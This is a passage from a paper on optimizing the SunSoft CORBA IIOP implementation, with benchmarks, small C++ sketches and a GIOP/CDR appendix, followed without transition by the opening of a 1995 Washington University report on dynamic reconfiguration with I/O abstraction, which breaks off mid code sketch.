\[^4\]The CDR::ptr_align_binary method is a static method that aligns a given address at the specified alignment.
- Solution: replace inline methods with preprocessor macros: In our second optimization step, therefore, we employ a more aggressive inlining strategy. Methods like CDR::ptr_align_binary, which became uninlined, are now forcibly inlined by defining them as preprocessor macros instead of as C++ inline methods.
The Sun C++ compiler did not inline certain methods (such as CDR::ptr_align_binary) due to their size. For instance, the code in this method swaps 16 bytes in a manually unrolled loop if the arriving data is in a different byte order. This increased the size of the code, causing the C++ compiler to ignore the inline keyword.
To handle this problem, we defined a helper method that performs the byte swapping. This helper method is invoked only if byte swapping is necessary, which decreased the size of the calling code enough for the compiler to select the method for inlining. For our experiments, this optimization was valid since we were transferring data between UltraSPARC machines with
the same byte order.
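The byte-swap refactoring can be sketched as follows, assuming an 8-byte double; swap8_helper and get_double are illustrative names, not SunSoft's. The expected case (same byte order) never calls the out-of-line helper, keeping the inlinable fast path small:

```cpp
#include <cassert>
#include <cstring>

// Out-of-line helper: called only when the arriving data is in a foreign
// byte order, so the rare, bulky work stays out of the fast path.
void swap8_helper(unsigned char* p) {
    for (int i = 0; i < 4; ++i) {
        unsigned char t = p[i];
        p[i] = p[7 - i];
        p[7 - i] = t;
    }
}

// Small fast path: with the swap moved into a helper, the compiler can
// honor the inline request. do_swap is false in the expected case.
inline double get_double(const unsigned char* src, bool do_swap) {
    unsigned char tmp[8];
    std::memcpy(tmp, src, 8);
    if (do_swap) swap8_helper(tmp);  // expected case: no swap, no call
    double v;
    std::memcpy(&v, tmp, 8);
    return v;
}
```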
- **Optimization results:** The results of our aggressive inlining are shown in Figure 11. A comparison of throughput obtained for this optimization step with that of step 1 is shown in Figure 12 (for doubles) and Figure 13 (for BinStructs). The results reveal that the performance for sending doubles remains almost the same as that obtained in Section 3.2.3. The results for sending BinStructs reveal that performance degrades and becomes comparable to the unoptimized original SunSoft IIOP implementation.
To understand this behavior, we examined the profiling measurements shown in Table 6 for the receiver. The sender once again spends most of its run-time doing network writes. The receiver-side Quantify profile output reveals that aggressive inlining has indeed worked. However, this inlining increases the code size of other methods (such as calc_nested_size_and_alignment, struct_traverse, and CDR::decoder), thereby increasing their run-time costs. As shown in Figures 4 and 5, these methods are called a large number of times (indicated in Table 6).
Certain SunSoft IIOP methods, such as CDR::decoder and TypeCode::traverse, are large and general-purpose. Inlining the methods described above causes further code bloat for these methods. Since they call each other a large number of times, the result is very high method call overhead. In addition, due to their large size, it is unlikely that the code for both methods can be resident in the processor cache at the same time, which further degrades performance.
In summary, although the second optimization step does not improve performance, it is a necessary step since it reveals the actual sources of overhead in the code, as explained in Sections 3.2.5 and 3.2.6.
### 3.2.5 Optimization Step 3: Precomputing, Adding Redundant State, and Passing Information Through Layers
- **Problem: too many method calls:** The aggressive inlining optimization in Section 3.2.4 caused a slight degradation in performance, due primarily to processor cache effects. Table 6 reveals that for sending structs, the high-cost methods are calc_nested_size_and_alignment, CDR::decoder, and struct_traverse. These methods are invoked a substantial number of times (29,367,801, 33,554,437, and 4,194,303 times, respectively) to process incoming requests.
To understand why so many method calls were made, we analyzed the calls to the struct_traverse method. The TypeCode interpreter invoked the struct_traverse method 2,097,152 times for data transmissions of 64 Mbytes in sequences of 32-byte BinStructs. In addition, the TypeCode interpreter calculated the size of BinStruct, which called struct_traverse internally for every BinStruct. This accounted for an additional 2,097,152 calls.
Although inlining did not improve performance, it set the stage to answer the key question of why these high-cost methods were invoked so frequently. As shown in Figure 5, and in the explanation in Section 2.2, we recognized that to demarshal an incoming sequence of BinStructs, the receiver’s TypeCode interpreter (TypeCode::traverse) must traverse each of its members using the struct_traverse method. As each member is traversed, this method determines the member’s size and alignment requirements using the calc_nested_size_and_alignment method. Each call to calc_nested_size_and_alignment can invoke the CDR::decoder method, which may in turn invoke the traverse method.
Close scrutiny of the CORBA request datapath shown in Figure 5 reveals that the struct_traverse method calculates the size and alignment requirements each time it is invoked. As shown above, this yields a very large number of method calls for large streams of data.
- **Solution 1: reduce obvious waste by precomputing values and storing additional state:** At this point, we made a crucial observation: for incoming sequences, the TypeCode of each element is the same. With this observation, we can pinpoint the obvious waste (Principle 2 from Table 1), which involves recalculating the size and alignment requirements of each member (see Figures 4 and 5). In our experiments, the methods calc_nested_size_and_alignment and
struct_traverse are expensive. Therefore, optimizing them is crucial.
To eliminate this obvious waste, we can precompute (Principle 4) the size and alignment requirements of each member and store them using additional state (Principle 5) in order to speed up expensive operations. We store this additional state as private data members of the TypeCode class. Thus, the TypeCode for BinStruct will calculate the size and alignment once and store them in the private data members. Every time the interpreter wants to traverse BinStruct, it uses the TypeCode for BinStruct that already has its size and alignment precomputed.\footnote{Note that our additional state does not affect the IIOP protocol since this state is stored locally and is not passed across the network.}
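A minimal sketch of the precompute-and-cache idea, with invented names: compute_size stands in for the expensive size/alignment calculation and is charged only once, no matter how many sequence elements are traversed:

```cpp
#include <cassert>
#include <cstddef>

// Sketch of Principles 4 and 5: compute a struct TypeCode's size once and
// cache it in private state, so repeated traversals of a sequence reuse it.
class CachedTypeCode {
public:
    std::size_t size() {
        if (!size_known_) {           // first traversal pays the cost
            cached_size_ = compute_size();
            size_known_ = true;
        }
        return cached_size_;          // later elements hit the cache
    }
    int compute_calls() const { return calls_; }
private:
    // Stand-in for the expensive calc_nested_size_and_alignment work.
    std::size_t compute_size() { ++calls_; return 32; }  // e.g. a BinStruct
    bool size_known_ = false;
    std::size_t cached_size_ = 0;
    int calls_ = 0;                   // how often the expensive path ran
};
```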
- **Solution 2: convert generic methods into special-purpose, efficient ones:** To further reduce method call overhead and to decrease the potential for processor cache misses, we moved the struct_traverse logic for handling tk_structs into the traverse method. This optimization illustrates an application of Principle 3, which converts generic methods into special-purpose, efficient ones. We chose to keep the traverse method generic, yet make it efficient, since we want our demarshaling engine to remain in the cache.
- **Analysis and remedies:** Finally, we infer the following drawbacks and suggest solutions to them:
1. *Avoiding duplication:* Whenever CDR::decoder is demarshaling a sequence of structs, it must retrieve the TypeCode and size of the element type. When the decoder invokes the TypeCode interpreter, the same information is retrieved once again. This duplication is wasteful and must be eliminated (while maintaining correctness).
To solve this problem, we used C++'s "default parameter" feature to pass the information from the decoder to the traverse method. This is an example of Principle 6, which recommends passing information between layers. To accomplish this, we modified the signature of the traverse method to use two additional void* parameters at the end. Each parameter has a default value of NULL, so it does not affect the existing implementation.
For the tk_sequence case, the decoder passes a pointer to the element's TypeCode and a pointer to the size information via the additional parameters of the traverse method. Inside the traverse logic for tk_sequences, we check whether the two parameters are non-NULL and retrieve the necessary information accordingly. Note that this approach is also reentrant, which is important since our IIOP implementation must run in multi-threaded applications.
2. *Avoid unnecessary function calls:* Whenever the TypeCode interpreter is passed a sequence of structs, it invokes CDR::decoder to demarshal the struct. However, this method simply reinvokes the interpreter without processing the struct. This additional method call overhead is wasteful and unnecessary.
To handle this second problem, we inserted a special-case check inside the traverse method for tk_sequences to see if the element type is a struct or an array. If it is, we invoke the traverse method directly to handle the element. Although this is still a recursive call, performance improves since the code for traverse is likely to remain in the instruction cache.
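The default-parameter pass-through described in item 1 can be sketched as follows; the names are invented, and lookup_size_expensively stands in for re-consulting the element's TypeCode:

```cpp
#include <cassert>
#include <cstddef>

// Stand-in for re-deriving the element's size from its TypeCode; the counter
// shows how often this expensive path actually runs.
std::size_t lookup_size_expensively(int* lookups) {
    ++*lookups;
    return 32;   // e.g. the size of one BinStruct
}

// Sketch of Principle 6: a defaulted pointer parameter lets an upper layer
// that already knows the element size hand it down, skipping the lookup.
// Callers that don't know it simply omit the argument.
std::size_t traverse_seq(std::size_t len, int* lookups,
                         const std::size_t* known_size = nullptr) {
    std::size_t elem = known_size ? *known_size                   // passed through
                                  : lookup_size_expensively(lookups);
    return len * elem;   // total bytes occupied by the sequence elements
}
```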
- **Optimization results:** The throughput measurements recorded after incorporating these optimizations are shown in Figure 14. Figures 15 and 16 illustrate the benefits of the optimizations from step 3 by comparing the throughput obtained for doubles and BinStructs, respectively, with those from the previous optimization steps.
The results illustrate that there is no change in the performance of any of the primitive types. This is expected since no wasteful (recursive) method call overhead is incurred for these types. However, for sending BinStructs, the throughput is now twice that of the previous results. This increase is primarily due to eliminating the overhead of the calc_nested_size_and_alignment method, which accounted for almost 30% of the run-time costs prior to these optimizations.
Table 7 depicts the profiling measurements for the receiver. The sender continues to spend most of its execution time performing network write calls. The methods in the receiver that account for most of the execution time for doubles include traverse, decoder, and
3.2.6 Optimization Step 4: Eliminating Obvious Waste and Specializing Generic Methods
- **Problem: expensive no-ops for memory deallocation:**
The optimizations described in Section 3.2.5 improve performance for sending BinStructs. Table 7 reveals that the overhead of the `deep_free` method is significant for primitive data types. This method is similar to the `decoder` method: it traverses the `TypeCode`, but deallocates dynamic memory rather than demarshaling data. Since the `deep_free` method has the same type signature as the `decoder` method, it can use the `traverse` method to traverse the data structure and deallocate memory.
Close scrutiny of the `deep_free` method indicates that memory must be freed for constructed data structures (such
as IDL sequences and structs). We observed that for sequences, if the element type is a primitive type, the deep_free method simply deallocates the buffer containing the sequence.
Instead of limiting itself to this simple logic, however, the deep_free method uses traverse to lookup the element type that comprises the IDL sequence. Then, for the entire length of the sequence, it invokes the deep_free method with the element's TypeCode. The deep_free method immediately determines that this is a primitive type and returns. However, this process is wasteful since it creates a large number of method calls that are essentially "no-ops."
- **Solution 1: eliminate obvious waste:** To optimize this, we changed the deletion strategy for sequences so that the element's TypeCode is checked first. If it is a primitive type, the traversal is not done and the memory is deallocated directly.
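A sketch of the revised deletion strategy, with invented names and call counters added purely to show the saving: primitive element types take the one-shot path, while constructed types still traverse per element:

```cpp
#include <cassert>

// Illustrative sketch of the deep_free fix: a primitive element type means
// the sequence buffer can be released in one step; only constructed element
// types need a per-element traversal.
enum Kind { k_primitive, k_struct };

struct FreeStats {
    int per_element_calls = 0;  // how many "no-op"-style element visits ran
    int bulk_frees = 0;         // how many one-shot buffer releases ran
};

void deep_free_element(FreeStats& s) { ++s.per_element_calls; }

void deep_free_sequence(Kind elem_kind, int len, FreeStats& s) {
    if (elem_kind == k_primitive) {  // fast path: check the element kind first
        ++s.bulk_frees;              // free the whole buffer directly
        return;
    }
    for (int i = 0; i < len; ++i)    // constructed types: recurse per element
        deep_free_element(s);
}
```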
- **Solution 2: specialize generic methods:** In addition to eliminating obvious waste, we also optimized the traverse method by reducing the number of calls it makes to methods other than itself. The goal is to improve processor cache affinity. This improvement was achieved by incorporating the encoder, decoder, and deep_free logic into the traverse method itself.
- **Optimization results:** The throughput measurements for the fourth optimization step are shown in Figure 17. The throughput comparison for this case with previous cases is shown in Figures 18 and 19. These results indicate that this final optimization step improves the performance of the original IIOP implementation by a factor of 1.7 for doubles, 2.56 for longs, 3.75 for shorts, 5 for chars/octets, and around 4.75 for BinStructs.
Figure 15: Throughput Comparison for Doubles After Applying the Third Optimization (precomputing and adding redundant state)
Figure 17: Throughput After Applying the Fourth Optimization (getting rid of waste)
Figure 16: Throughput Comparison for Structs After Applying the Third Optimization (precomputing and adding redundant state)
Figure 18: Throughput Comparison for Doubles After Applying the Fourth Optimization (getting rid of waste)
Tables 8 and 9 illustrate the remaining high-cost sender-side and receiver-side methods, respectively. The tables indicate that for primitive types, the cost of writing to the network and reading from the network becomes the primary contributor to the run-time costs. For BinStructs, the TypeCode interpreter still remains the dominant factor, accounting for almost 92% of the receiver-side run-time costs. To further reduce the overhead of the interpreter, we are applying more sophisticated compiler-based optimizations. These include using flow analysis to identify dependencies in the code. Having dealt with the dependencies, it would be possible to obtain an optimal Integrated Layer Processing (ILP) implementation of the interpreter. An ILP-based implementation will reduce excessive data manipulation operations, which is essential for RISC-based architectures.
3.3 Maintaining CORBA Compliance and Interoperability
The optimizations presented in the previous sections are useful only to the extent that we maintain CORBA compliance and can interoperate with IIOP-based ORBs. This subsection presents the throughput results obtained for running the same experiment with Visigenic’s VisiBroker for C++ client and the SunSoft IIOP server. Figures 20 and 21 illustrate the throughput measurements for the original SunSoft IIOP server and our highly optimized implementation, respectively.
4 Related Work
This section describes results from existing work on protocol optimization based on one or more of the principles mentioned in Table 1. In addition, we discuss related work on CORBA performance measurements and presentation layer marshaling.
4.1 Related Work Based on Optimization Principles
[4] describes a technique called header prediction that predicts the message header of incoming TCP packets. This technique is based on the observation that many fields in the header remain constant between consecutive packets. This observation led to the creation of a template for the expected packet header. The optimizations reported in [4] are based on Principle 1 (optimize for the expected case) and Principle 3 (precompute, if possible). We apply both of these principles in the optimizations presented in this paper.
4.2 Related Work Based on CORBA Performance Measurements
[8, 9, 10] show that the performance of CORBA implementations is relatively poor compared to that of low-level implementations using C/C++. The primary source of ORB-level overhead stems from marshaling and demarshaling. [8] measures the performance of the static invocation interface. [9] measures the performance of the dynamic invocation interface and the dynamic skeleton interface. [10] measures the performance of CORBA implementations in terms of latency and support for a very large number of objects. However, these results were restricted to measuring the performance of communication between homogeneous ORBs. These tests do not measure the run-time costs of interoperability between ORBs from different vendors. In addition, these papers do not provide solutions to reduce these overheads. In contrast, we have provided solutions that significantly improve performance by reducing marshaling/demarshaling overhead.
4.3 Related Work Based on Interpretive and Compiled Forms of Marshaling
[11] describes the tradeoffs of using compiled and interpreted marshaling schemes. Although compiled stubs are faster, they are also larger. In contrast, interpretive marshaling is slower, but smaller in size. [11] describes a hybrid scheme that combines compiled and interpretive marshaling to achieve better performance. This work was done in the context of the ASN.1/BER encoding [12].
According to the SunSoft IIOP implementors, interpretive marshaling is preferable since it decreases code size and increases the likelihood of remaining in the processor cache. Our measurements do not compare the SunSoft IIOP interpretive marshaling scheme with a compiled marshaling scheme. As explained in Section 5, we are currently implementing a CORBA IDL compiler that can generate compiled stubs and skeletons. Our goal is to generate efficient stubs and skeletons by extending optimizations provided in USC [16].
5 Concluding Remarks
This paper illustrates the benefits of applying principle-based optimizations [21] that improve the performance of the SunSoft CORBA Inter-ORB Protocol (IIOP) reference implementation. The principles that directed our optimizations included: (1) optimizing for the expected case, (2) eliminating obvious waste, (3) replacing general-purpose methods with efficient special-purpose ones, (4) precomputing values, if possible, (5) storing redundant state to speed up expensive operations, and (6) passing information between layers.
The results of applying these optimization principles to SunSoft IIOP improved its performance 1.8 times for doubles, 3.3 times for longs, 3.75 times for shorts, 5 times for chars/octets, and 4.2 times for richly-typed
structs over ATM networks. Our optimized implementation is now competitive with existing commercial ORBs [8, 10] using the static invocation interface (SII), and 2 to 4.5 times (depending on the data type) faster than commercial ORBs using the dynamic skeleton interface (DSI) [9]. In addition, we show that our optimized implementation of IIOP interoperates seamlessly with Visigenic's VisiBroker for C++, a commercially available ORB.
In addition to our optimizations, we are currently enhancing the SunSoft IIOP implementation to form a complete high-performance ORB [18]. This involves extending the SunSoft CORBA IDL compiler to generate optimized stubs and skeletons from IDL interfaces. These generated stubs and skeletons will transform C++ methods into/from CORBA requests via our optimized IIOP implementation. In addition, we are incorporating an Object Adapter into our IIOP implementation that supports de-layered request demultiplexing. This ORB will be used to compare the impact of using compiled marshaling stubs and skeletons vs. the interpretive scheme currently implemented in SunSoft IIOP. We plan to measure the tradeoffs of using the two marshaling schemes to achieve an optimal hybrid solution [11].
References
A The CORBA General Inter-ORB Protocol and Internet Inter-ORB Protocol
This section describes the components in the CORBA General Inter-ORB Protocol (GIOP) and Internet Inter-ORB Protocol (IIOP) protocol in detail.
A.1 Common Data Representation (CDR)
The GIOP CDR defines a transfer syntax for transmitting OMG IDL data types across a network. The CDR definition maps
the OMG IDL data types from their native host format to a bi-canonical, low-level representation. The bi-canonical representation supports both the little-endian and the big-endian formats. The salient features of CDR are:
- **Variable byte ordering**: The sender encodes the data using its native byte-order. Special flag values in the encoded stream indicate the byte order used. Thus, only receivers with byte ordering different from the sender are required to perform byte swapping to retrieve correct binary values.
- **Aligned Types**: Primitive OMG IDL data types are aligned on their "natural" boundaries within GIOP messages, as shown in Table 10. Constructed data types (such as IDL sequence and struct) have no additional alignment restrictions beyond those of their primitive types; i.e., the size and alignment of a constructed type depend on the size and alignment of the primitives that make up the constructed type.
- **Complete OMG IDL mapping**: CDR provides a mapping for all the OMG IDL data types, including transferable pseudo-objects such as TypeCodes. CORBA pseudo-objects are those entities that are neither CORBA primitive types nor constructed types. A client acquiring a reference to a pseudo-object cannot use DII to make calls to the methods described by the IDL interface of that pseudo-object. The DSI and DII interpreters use the TypeCode information passed to them by users of DSI and DII, respectively.
- **CDR Encapsulations**: A CDR encapsulation is a sequence of octets. Encapsulations are typically used to marshal parameters of the following types:
- **Complex TypeCodes** — see Table 11.
- **IIOP protocol profiles inside interoperable object references (IOR)** — A protocol profile provides information about the transport protocol that enables client applications to talk to the servers. In the IIOP profile (Figure 22), this information consists of the host name and port number on which the server is listening, and the object_key of the target object implemented by that server. An IOR (see Figure 23) represents a complete information about an object. This information includes the type it represents, the protocols it supports, whether it is null or not, and any ORB related services that are available.
### Table 10: Alignment for OMG Primitive Types in Bytes
<table>
<thead>
<tr>
<th>Type</th>
<th>Alignment</th>
</tr>
</thead>
<tbody>
<tr>
<td>char</td>
<td>1</td>
</tr>
<tr>
<td>octet</td>
<td>1</td>
</tr>
<tr>
<td>short</td>
<td>2</td>
</tr>
<tr>
<td>long</td>
<td>4</td>
</tr>
<tr>
<td>unsigned short</td>
<td>2</td>
</tr>
<tr>
<td>unsigned long</td>
<td>4</td>
</tr>
<tr>
<td>float</td>
<td>4</td>
</tr>
<tr>
<td>double</td>
<td>8</td>
</tr>
<tr>
<td>boolean</td>
<td>1</td>
</tr>
<tr>
<td>enum</td>
<td>4</td>
</tr>
</tbody>
</table>
### Table 11: TypeCode Enum Values, Parameter List Types, and Parameters
- **Service-specific contexts** — The COSS [14] specification defines a number of services such as the transaction service. For interoperability, it may be required to pass service-specific information via opaque parameters. This is achieved using the service-specific context.
The first byte of an encapsulation always denotes the byte order used to create the encapsulation. Encapsulations can be nested inside other encapsulations, and each encapsulation can use either byte order, irrespective of the byte order used by the encapsulations that enclose it.
A.2 GIOP Message Formats
The GIOP specification defines seven types of messages, and each message type is assigned a unique value. The originator of a GIOP message can be a client and/or a server. Table 12 depicts the seven message types and the permissible originators of each.
A GIOP message begins with a GIOP header (Figure 24), followed by one of the message types (Figure 25), and finally the body of the message, if any.
A.3 GIOP Message Transport
The GIOP specification makes certain assumptions about the transport protocol that can be used to transfer GIOP messages. These assumptions are listed below.
- The transport mechanism must be connection-oriented;
- The transport protocol must be reliable;
- The transport data is a byte stream without message delimitations;
- The transport provides notification of disorderly connection loss;
- The transport's model of establishing a connection can be mapped onto a general connection model (such as TCP/IP).
Examples of transport protocols that meet these requirements are TCP/IP and OSI TP4.
A.4 Internet Inter-ORB Protocol (IIOP)
The IIOP is a specialized mapping of GIOP onto the TCP/IP protocols. ORBs that use IIOP can communicate with other ORBs that publish their TCP/IP addresses as interoperable object references (IORs). IIOP IOR profiles are shown in Figure 22. Figure 23 shows the format of an IOR. When IIOP is used, the profile data member of the TaggedProfile structure holds the profile data of IIOP shown in Figure 22.
B TTCP IDL description
The following CORBA IDL interface was used in our experiments to measure the throughput of SunSoft IIOP:
```idl
// BinStruct is 32 bytes (including padding).
struct BinStruct
{
  short s; char c; long l;
  octet o; double d; octet pad[8];
};

// Richly typed data.
interface tcp_throughput
{
  typedef sequence<short> ShortSeq;
  typedef sequence<long> LongSeq;
  typedef sequence<double> DoubleSeq;
  typedef sequence<char> CharSeq;
  typedef sequence<octet> OctetSeq;
  typedef sequence<BinStruct> StructSeq;

  // Methods to send various data type sequences.
  oneway void sendShortSeq (in ShortSeq ttcp_seq);
  oneway void sendLongSeq (in LongSeq ttcp_seq);
  oneway void sendDoubleSeq (in DoubleSeq ttcp_seq);
  oneway void sendCharSeq (in CharSeq ttcp_seq);
  oneway void sendOctetSeq (in OctetSeq ttcp_seq);
  oneway void sendStructSeq (in StructSeq ttcp_seq);

  oneway void start_timer ();
  oneway void stop_timer ();
};
```
Dynamic Reconfiguration with I/O Abstraction
Authors: Bala Swaminathan and Kenneth J. Goldman
Dynamic Reconfiguration with I/O Abstraction
Bala Swaminathan
Kenneth J. Goldman
WUCS-93-21
August 20 1993
Revised March 17 1995
Department of Computer Science
Washington University
Campus Box 1045
One Brookings Drive
Saint Louis, MO 63130–4899
Dynamic Reconfiguration with I/O Abstraction
Bala Swaminathan
bs@cs.wustl.edu
Department of Computer Science
Washington University
St. Louis, MO 63130
Kenneth J. Goldman*
kjg@cs.wustl.edu
Department of Computer Science
Washington University
St. Louis, MO 63130
March 17, 1995
Abstract
Dynamic reconfiguration is explored in the context of I/O abstraction, a new programming model that defines the communication structure of a system in terms of connections among well-defined data interfaces for the modules in the system. The properties of I/O abstraction, particularly the clear separation of computation from communication and the availability of a module's state information, help simplify the reconfiguration strategy. Both logical and physical reconfiguration are discussed, with an emphasis on a new module migration mechanism that (1) takes advantage of the underlying I/O abstraction model, (2) avoids the expense and complication of state extraction techniques, (3) minimizes the amount of code required for migration and confines that code to a separate section of the program, and (4) is designed to permit migration across heterogeneous hosts and to allow replacement of one implementation by another, even if the new implementation is written in another programming language. The flexibility of the migration mechanism is illustrated by presenting three different paradigms for constructing reconfigurable modules that are supported by this new mechanism. A uniform specification mechanism is provided for both logical and physical reconfiguration.
Keywords: heterogeneous systems, dynamic reconfiguration, distributed systems, process migration
1 Introduction
The configuration of a distributed system consists of three parts: a *logical configuration* that defines the set of modules and their logical communication channels, a *physical configuration* that assigns modules to processors and assigns logical communication channels to physical paths in the network, and a *hardware configuration* that consists of a set of processors and physical communication links. *Dynamic reconfiguration* is the act of modifying the configuration of a system while the modules are executing and interacting.
Logical reconfiguration may involve adding or removing modules, adding or removing logical communication channels, replacing one module by another, or redirecting communication. Physical reconfiguration may involve reassigning a module to a different processor (module migration) or assigning the communication to a different path in the network. Hardware reconfiguration may involve adding or removing processors, or adding or removing communication links. Reconfiguration is a planned activity, and does not include unplanned changes to the system due to hardware or software failures. However, some of the techniques for managing dynamic reconfiguration can be useful in building fault-tolerant systems.
Goscinski [6] points to several important benefits of dynamic reconfiguration. For example, if a new efficient algorithm is developed for a module that is part of a long-running or continuously-available application, dynamic logical reconfiguration makes it possible to replace the original module with the efficient version without having to start over or interrupt service. Dynamic physical reconfiguration is useful for migrating modules from one machine to another in order to perform routine maintenance or balance load. Dynamic physical reconfiguration can also be used to minimize computation time or message traffic of some applications by migrating processes to machines with special-purpose hardware or specialized databases at times when those processes have specific computational or data requirements. Furthermore, when advance notice is available about system shutdown, active processes in the machine can be relocated.
Dynamic reconfiguration must be handled carefully in order to preserve the logical consistency of the system. Changes to the logical configuration should appear atomic. For example, if a module A is replaced by a module B, no module should receive a message originating at A after receiving a message from B. Similarly, changes to the physical configuration should not alter the logical execution (results) of the executing system. For example, if a module on processor 1 is reassigned to processor 2, none of the module’s output should be lost or duplicated as a result of the migration. These problems imply certain requirements for distributed environments that support reconfiguration. Hofmeister and Purtilo put forth the following requirements for reconfiguration in
heterogeneous distributed systems [8]:
(R1) communication across heterogeneous hosts
(R2) current configuration is accessible
(R3) bindings (interconnections) are not compiled into modules
(R4) no covert communication among modules
(R5) ability to add/remove modules and bindings
(R6) access to messages in transit
(R7) mechanism for synchronizing activities
(R8) access to module's state information
Item (R1) is necessary unless the system is homogeneous. Items (R2) through (R7) are necessary for both logical and physical reconfiguration. Item (R8) is necessary only for module replacement and physical reconfiguration.
Various strategies for different kinds of reconfiguration have been studied. For example, a Durra [1, 2] application can evolve during execution by dynamically removing processes and their ports and instantiating new processes and their ports without affecting other processes. Darwin [10, 14, 12], a generalization of Conic [11, 12], supports logical reconfiguration where the programmer adds code that adapts program modules to participate in reconfiguration. Both Durra and Darwin [2, 10] allow only adding or deleting processes and interconnections between them. PROFIT [9], a recent language that provides a mixture of RPC and data sharing for communication, permits dynamic binding of slots in special cases [7]. Argus [13] supports reconfiguration with two phase locking over atomic objects and version management recovery techniques. Some systems support physical reconfiguration, but support for module migration often has relied upon complicated and expensive techniques for the extraction of the module's state information [16]. Platforms like Polylith [15] support moving a process to another machine while the application is executing. In Polylith, configuration is expressed in terms of a set of procedure call bindings. The programmer specifies "reconfiguration points," that are used to automatically prepare a process
\footnote{This set of requirements does not appear in their paper, but was part of the conference presentation.}
to participate during reconfiguration and special techniques are used to capture internal program state in order to accomplish the migration [8].
In this paper, we consider logical and physical dynamic reconfiguration in heterogeneous distributed systems whose modules are written using a new programming model called I/O abstraction [5]. Briefly, I/O abstraction is the view that each software module in a system has a set of data structures that may be externally observed and/or manipulated. This set of data structures forms the external interface (or presentation) of the module. Each module is written independently and modules are then configured by establishing logical connections among the data structures in their presentations. As published data structures are updated, I/O occurs implicitly ("under the covers") according to the logical connections established in the configuration. I/O abstraction is similar to the dataflow model, except that I/O abstraction modules can produce results autonomously, in addition to being able to react to input events, and communication can be bidirectional.
I/O abstraction is designed to simplify applications programming by treating communication as a high-level relationship between the states of communicating modules and leaving program I/O as an implicit activity. Since low level input and output activities are hidden, programmers need not be concerned with explicitly initiating communication activities, such as sending and receiving messages, and therefore need not be concerned with the particular communication primitives provided by the operating system or the network interface. The connection-oriented view of I/O abstraction also permits continuous media communication (such as audio and video) to be handled with the same high-level communication model used for discrete data.
Two properties make I/O abstraction particularly well-suited for supporting dynamic reconfiguration. The first of these properties is that I/O abstraction achieves a separation of computation from communication. Rather than writing applications programs that are peppered with explicit I/O requests, the applications programmer is concerned only with the details of the computation, and the communication is declared separately in terms of high-level relationships among the state components of different modules. Thus, the logical configuration is known to the system and can be modified independently, without involvement of the software modules. This is certainly a requirement for logical reconfiguration, but is also a necessity for physical reconfiguration (see R2–R5 above).
The second property of I/O abstraction that facilitates reconfiguration is that it exposes certain
state information (see R8) in the presentation of each module. This state information is accessible to the run-time system at all times. This ability to access state distinguishes I/O abstraction from many other programming models that provide access to configuration information. Because I/O abstraction already exposes certain local state information for each module, we are able to avoid some of the problems that have plagued other systems and accomplish physical reconfiguration in a straightforward and efficient manner.
In this paper, we are interested in the problem of semantic migration, in which the correctness of the observable behavior of the application is preserved, as opposed to state migration, in which the address space of the migrating module is transferred to the destination. That is, our point of view is that of the external environment as opposed to the internal structure of the migrated process. Advantages of semantic migration (in I/O abstraction) include (1) migrating without expensive state extraction, (2) migration across heterogeneous hosts, (3) "take over" by modules with the same presentation written in other programming languages, and (4) minimal (typically one-line) change to the program code. In some kinds of applications, however, additional code may be needed in the "migratable" program, or intermediate results from computation at the source processor may be lost during migration and must be recomputed.
The remainder of this paper is organized as follows. In Section 2, we describe The Programmers' Playground, a software library and run-time system we have designed to support the I/O abstraction programming model. This is followed, in Section 3, by a discussion of reconfiguration in Playground. The emphasis is on a detailed description of a module migration mechanism for supporting physical reconfiguration that takes advantage of the properties of I/O abstraction. Section 4 illustrates the flexibility of the process migration mechanism by describing three different paradigms for constructing relocatable modules that are compatible with our migration mechanism. The implementation of module migration in The Programmers' Playground is discussed in Section 5. We conclude in Section 6 with a discussion and possible directions for future research.
2 The Programmers' Playground
The Programmers' Playground is a software library and run-time system that supports I/O abstraction in terms of three fundamental concepts: data, control, and connections. It is not a programming language, but rather a coordination language [4] designed to work with multiple computation languages in combination. We discuss data, control, and connections, and then describe a Playground implementation for C++ on the Solaris operating system.
2.1 Data

Data, the units of a module's state, may be private to a module or they may be published for access by other modules. Playground provides a library of data types for declaring publishable data. These include base types (integer, real, etc.), tuples, and aggregates (sets, arrays, etc.) of homogeneous elements. Aggregates and tuples may be arbitrarily nested, and programmers may define aggregate types in addition to those provided in the Playground library.

Each Playground module has a presentation that consists of the set of data structures that have been published by that module. The set of presentation entries may change dynamically as the module runs. However, for the purposes of reconfiguration, we will assume that the presentation is fixed at initialization (although the values of the data structures in the presentation may, of course, change). Documentation and protection information may be associated with each published data item in order to assist in the configuration process and protect against unauthorized use. Data type information is automatically associated with each presentation entry so that type checking may occur at (re)configuration time.
It is helpful to think about a Playground module as interacting with an environment, an external
collection of modules and users that are unknown to the module but may read and modify the data
items in its presentation (as permitted by the protection information defined for the data items). A
behavior of a module is a sequence of values held by the data items in its presentation. A module's
behavior is the view that the environment has of the module.
The notion of behavior is useful for defining the correctness criteria for our reconfiguration
algorithm. Let $B$ be the set of all allowable behaviors of a module $M$ with presentation $P$, and
suppose that $M$ is involved in a reconfiguration (logical or physical). If $P_v$ is the value of $P$ just
before the reconfiguration, then $M$'s behavior after the reconfiguration should be a suffix $B'$ of an
element of $B$ such that $B'$ begins with the presentation value $P_v$. Moreover, if the reconfiguration
is only a physical reconfiguration, then $M$'s behavior should not be distinguishable from a possible
behavior in an identical system in which the reconfiguration did not occur.
2.2 Control
The control portion of a Playground module is divided into two components: *active control* and *reactive control*. The active control carries out the ongoing computation of the module, while the reactive control carries out activities in response to input from the environment. For example, in a simulation module, the active control would be responsible for the main loop that performs the computation for each event in the simulation, while the reactive control would handle changes in externally controllable parameters of the simulation.
The active control component of a Playground module is the control defined by the “mainline” portion of the module. To define the reactive control, one associates with each data item an activity to be performed when the value of that data item is changed by the environment. As a simple example, one might associate with data item $x$ an enqueue operation for some “update queue” $q$. With each external update to $x$, the new value of $x$ would be enqueued into $q$ for later processing.
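The reactive-control pattern above can be sketched in standard C++. This is an illustrative model, not the Playground veneer: the names `PublishedInt`, `on_external_update`, and `Module` are assumptions introduced for the sketch. It shows the paper's example of associating an enqueue operation with a published item $x$ so that external updates are recorded in an update queue $q$ for later processing by the active control.

```cpp
#include <cassert>
#include <functional>
#include <queue>

// Hypothetical sketch of reactive control: each published item carries an
// optional reaction that fires when the environment writes a new value.
// These names are illustrative, not the real Playground API.
struct PublishedInt {
    int value = 0;
    std::function<void(int)> reaction;  // reactive control for this item

    // Called by the runtime when a connection delivers an external update.
    void on_external_update(int new_value) {
        value = new_value;
        if (reaction) reaction(new_value);
    }
};

// The paper's example: associate with x an enqueue onto an update queue q,
// so external updates are saved for later processing by active control.
struct Module {
    PublishedInt x;
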